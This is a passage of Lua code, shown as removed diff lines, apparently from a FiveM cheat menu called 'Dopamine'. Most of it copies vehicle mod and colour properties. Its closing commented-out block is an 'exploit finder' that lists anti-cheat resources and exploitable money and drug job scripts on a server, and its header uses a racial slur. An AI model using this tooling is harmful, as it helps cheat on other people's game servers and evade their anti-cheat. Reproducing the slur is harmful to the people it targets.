- modRightFender = GetVehicleMod(vehicle, 9),
- modRoof = GetVehicleMod(vehicle, 10),
- modEngine = GetVehicleMod(vehicle, 11),
- modBrakes = GetVehicleMod(vehicle, 12),
- modTransmission = GetVehicleMod(vehicle, 13),
- modHorns = GetVehicleMod(vehicle, 14),
- modSuspension = GetVehicleMod(vehicle, 15),
- modArmor = GetVehicleMod(vehicle, 16),
- modTurbo = IsToggleModOn(vehicle, 18),
- modSmokeEnabled = IsToggleModOn(vehicle, 20),
- modXenon = IsToggleModOn(vehicle, 22),
- modFrontWheels = GetVehicleMod(vehicle, 23),
- modBackWheels = GetVehicleMod(vehicle, 24),
- modPlateHolder = GetVehicleMod(vehicle, 25),
- modVanityPlate = GetVehicleMod(vehicle, 26),
- modTrimA = GetVehicleMod(vehicle, 27),
- modOrnaments = GetVehicleMod(vehicle, 28),
- modDashboard = GetVehicleMod(vehicle, 29),
- modDial = GetVehicleMod(vehicle, 30),
- modDoorSpeaker = GetVehicleMod(vehicle, 31),
- modSeats = GetVehicleMod(vehicle, 32),
- modSteeringWheel = GetVehicleMod(vehicle, 33),
- modShifterLeavers = GetVehicleMod(vehicle, 34),
- modAPlate = GetVehicleMod(vehicle, 35),
- modSpeakers = GetVehicleMod(vehicle, 36),
- modTrunk = GetVehicleMod(vehicle, 37),
- modHydrolic = GetVehicleMod(vehicle, 38),
- modEngineBlock = GetVehicleMod(vehicle, 39),
- modAirFilter = GetVehicleMod(vehicle, 40),
- modStruts = GetVehicleMod(vehicle, 41),
- modArchCover = GetVehicleMod(vehicle, 42),
- modAerials = GetVehicleMod(vehicle, 43),
- modTrimB = GetVehicleMod(vehicle, 44),
- modTank = GetVehicleMod(vehicle, 45),
- modWindows = GetVehicleMod(vehicle, 46),
- modLivery = GetVehicleLivery(vehicle),
- suspensionRaise = GetVehicleHandlingFloat(vehicle, 'CHandlingData', 'fSuspensionRaise'),
- }
- else
- return
- end
- end
- = function(vehicle, props)
- if DoesEntityExist(vehicle) then
- local colorPrimary, colorSecondary = GetVehicleColours(vehicle)
- local pearlescentColor, wheelColor = GetVehicleExtraColours(vehicle)
- SetVehicleModKit(vehicle, 0)
- if props.plate then SetVehicleNumberPlateText(vehicle, props.plate) end
- if props.plateIndex then SetVehicleNumberPlateTextIndex(vehicle, props.plateIndex) end
- if props.bodyHealth then SetVehicleBodyHealth(vehicle, props.bodyHealth + 0.0) end
- if props.engineHealth then SetVehicleEngineHealth(vehicle, props.engineHealth + 0.0) end
- if props.fuelLevel then SetVehicleFuelLevel(vehicle, props.fuelLevel + 0.0) end
- if props.dirtLevel then SetVehicleDirtLevel(vehicle, props.dirtLevel + 0.0) end
- if props.color1 then SetVehicleColours(vehicle, props.color1, colorSecondary) end
- if props.color2 then SetVehicleColours(vehicle, props.color1 or colorPrimary, props.color2) end
- if props.pearlescentColor then SetVehicleExtraColours(vehicle, props.pearlescentColor, wheelColor) end
- if props.wheelColor then SetVehicleExtraColours(vehicle, props.pearlescentColor or pearlescentColor, props.wheelColor) end
- if props.wheels then SetVehicleWheelType(vehicle, props.wheels) end
- if props.windowTint then SetVehicleWindowTint(vehicle, props.windowTint) end
- if props.neonEnabled then
- SetVehicleNeonLightEnabled(vehicle, 0, props.neonEnabled[1])
- SetVehicleNeonLightEnabled(vehicle, 1, props.neonEnabled[2])
- SetVehicleNeonLightEnabled(vehicle, 2, props.neonEnabled[3])
- SetVehicleNeonLightEnabled(vehicle, 3, props.neonEnabled[4])
- end
- if props.extras then
- for id,enabled in pairs(props.extras) do
- if enabled then
- SetVehicleExtra(vehicle, tonumber(id), 0)
- else
- SetVehicleExtra(vehicle, tonumber(id), 1)
- end
- end
- end
- if props.neonColor then SetVehicleNeonLightsColour(vehicle, props.neonColor[1], props.neonColor[2], props.neonColor[3]) end
- if props.xenonColor then Dopamine.natives.setVehicleXenonLightsColour(vehicle, props.xenonColor) end
- if props.modSmokeEnabled then ToggleVehicleMod(vehicle, 20, true) end
- if props.tyreSmokeColor then SetVehicleTyreSmokeColor(vehicle, props.tyreSmokeColor[1], props.tyreSmokeColor[2], props.tyreSmokeColor[3]) end
- if props.modSpoilers then SetVehicleMod(vehicle, 0, props.modSpoilers, false) end
- if props.modFrontBumper then SetVehicleMod(vehicle, 1, props.modFrontBumper, false) end
- if props.modRearBumper then SetVehicleMod(vehicle, 2, props.modRearBumper, false) end
- if props.modSideSkirt then SetVehicleMod(vehicle, 3, props.modSideSkirt, false) end
- if props.modExhaust then SetVehicleMod(vehicle, 4, props.modExhaust, false) end
- if props.modFrame then SetVehicleMod(vehicle, 5, props.modFrame, false) end
- if props.modGrille then SetVehicleMod(vehicle, 6, props.modGrille, false) end
- if props.modHood then SetVehicleMod(vehicle, 7, props.modHood, false) end
- if props.modFender then SetVehicleMod(vehicle, 8, props.modFender, false) end
- if props.modRightFender then SetVehicleMod(vehicle, 9, props.modRightFender, false) end
- if props.modRoof then SetVehicleMod(vehicle, 10, props.modRoof, false) end
- if props.modEngine then SetVehicleMod(vehicle, 11, props.modEngine, false) end
- if props.modBrakes then SetVehicleMod(vehicle, 12, props.modBrakes, false) end
- if props.modTransmission then SetVehicleMod(vehicle, 13, props.modTransmission, false) end
- if props.modHorns then SetVehicleMod(vehicle, 14, props.modHorns, false) end
- if props.modSuspension then SetVehicleMod(vehicle, 15, props.modSuspension, false) end
- if props.modArmor then SetVehicleMod(vehicle, 16, props.modArmor, false) end
- if props.modTurbo then ToggleVehicleMod(vehicle, 18, props.modTurbo) end
- if props.modXenon then ToggleVehicleMod(vehicle, 22, props.modXenon) end
- if props.modFrontWheels then SetVehicleMod(vehicle, 23, props.modFrontWheels, false) end
- if props.modBackWheels then SetVehicleMod(vehicle, 24, props.modBackWheels, false) end
- if props.modPlateHolder then SetVehicleMod(vehicle, 25, props.modPlateHolder, false) end
- if props.modVanityPlate then SetVehicleMod(vehicle, 26, props.modVanityPlate, false) end
- if props.modTrimA then SetVehicleMod(vehicle, 27, props.modTrimA, false) end
- if props.modOrnaments then SetVehicleMod(vehicle, 28, props.modOrnaments, false) end
- if props.modDashboard then SetVehicleMod(vehicle, 29, props.modDashboard, false) end
- if props.modDial then SetVehicleMod(vehicle, 30, props.modDial, false) end
- if props.modDoorSpeaker then SetVehicleMod(vehicle, 31, props.modDoorSpeaker, false) end
- if props.modSeats then SetVehicleMod(vehicle, 32, props.modSeats, false) end
- if props.modSteeringWheel then SetVehicleMod(vehicle, 33, props.modSteeringWheel, false) end
- if props.modShifterLeavers then SetVehicleMod(vehicle, 34, props.modShifterLeavers, false) end
- if props.modAPlate then SetVehicleMod(vehicle, 35, props.modAPlate, false) end
- if props.modSpeakers then SetVehicleMod(vehicle, 36, props.modSpeakers, false) end
- if props.modTrunk then SetVehicleMod(vehicle, 37, props.modTrunk, false) end
- if props.modHydrolic then SetVehicleMod(vehicle, 38, props.modHydrolic, false) end
- if props.modEngineBlock then SetVehicleMod(vehicle, 39, props.modEngineBlock, false) end
- if props.modAirFilter then SetVehicleMod(vehicle, 40, props.modAirFilter, false) end
- if props.modStruts then SetVehicleMod(vehicle, 41, props.modStruts, false) end
- if props.modArchCover then SetVehicleMod(vehicle, 42, props.modArchCover, false) end
- if props.modAerials then SetVehicleMod(vehicle, 43, props.modAerials, false) end
- if props.modTrimB then SetVehicleMod(vehicle, 44, props.modTrimB, false) end
- if props.modTank then SetVehicleMod(vehicle, 45, props.modTank, false) end
- if props.modWindows then SetVehicleMod(vehicle, 46, props.modWindows, false) end
- if props.modLivery then
- SetVehicleMod(vehicle, 48, props.modLivery, false)
- SetVehicleLivery(vehicle, props.modLivery)
- end
- if props.suspensionRaise then
- SetVehicleHandlingFloat(vehicle, 'CHandlingData', 'fSuspensionRaise', props.suspensionRaise)
- end
- end
- end
- --[[niggerian trash exploit finder
- do
- local totalExploitablesTable = {}
- local veriScaryAntiCheats = {
- 'anticheat', 'esx_anticheat', 'alphaveta', 'dfwm', 'fzac',
- 'anticheese', 'skinchanger2', 'NSAC', 'avac', 'nertigel_ac'
- }
- local exploitablesDrugs = {
- 'esx_drugs', 'esx_illegal_drugs'
- }
- local exploitablesMoneyMaker = {
- 'esx_vangelico_robbery','esx_vangelico','esx_burglary','99kr-burglary','esx_minerjob',
- 'esx_mining','esx_miner','esx_fishing','james_fishing','loffe-fishing',
- 'esx_mugging','loffe_robbery','esx_prisonwork','loffe_prisonwork','esx_robnpc',
- 'MF_DrugSales','MF_drugsales','ESX_DrugSales','lenzh_chopshop','esx_chopshop',
- 'ESX_Deliveries','ESX_Cargodelivery','napadtransport','Napad_transport_z_gotowka','esx_truck_robbery',
- 'napadnakase','Napad_na_kase','utk_oh','utk_ornateheist','aurora_principalbank',
- 'esx_hunting','esx_qalle_hunting','esx-qalle-hunting','esx_taxijob','esx_taxi',
- 'esx_carthiefjob','esx_carthief','esx_rangerjob','esx_ranger','esx_godirtyjob',
- 'esx_godirty','esx_banksecurityjob','esx_banksecurity','esx_pilotjob','esx_pilot',
- 'esx_pizzajob','esx_pizza','esx_gopostaljob','esx_gopostal','esx_garbagejob',
- 'esx_garbage', 'esx_truckerjob', 'esx_trucker'
- }
- local totalAnticheats = 0
- local totalExploitableMoneyMaker = 0
- local totalExploitableDrugs = 0
- for i=1, #exploitablesMoneyMaker do
- if Dopamine.functions.doesResourceExist(exploitablesMoneyMaker[i]) then
- table.insert(totalExploitablesTable, exploitablesMoneyMaker[i])
- totalExploitableMoneyMaker = totalExploitableMoneyMaker + 1
- end
- end
- for i=1, #exploitablesDrugs do
- if Dopamine.functions.doesResourceExist(exploitablesDrugs[i]) then
- table.insert(totalExploitablesTable, exploitablesDrugs[i])
- totalExploitableDrugs = totalExploitableDrugs + 1
- end
- end
- for i=1, #veriScaryAntiCheats do
- if Dopamine.functions.doesResourceExist(veriScaryAntiCheats[i]) then
- totalAnticheats = totalAnticheats + 1
- end
- end
- dir_print('Vulnerable resource found: '..json.encode(totalExploitablesTable))
- dir_print('Anticheats: '..totalAnticheats)
- dir_print(
- '\nTotal Exploitables:\n'..
- ' Moneymaker: '..totalExploitableMoneyMaker..'\n'..
- ' Drugs: '..totalExploitableDrugs..'\n'
- )
- end]]
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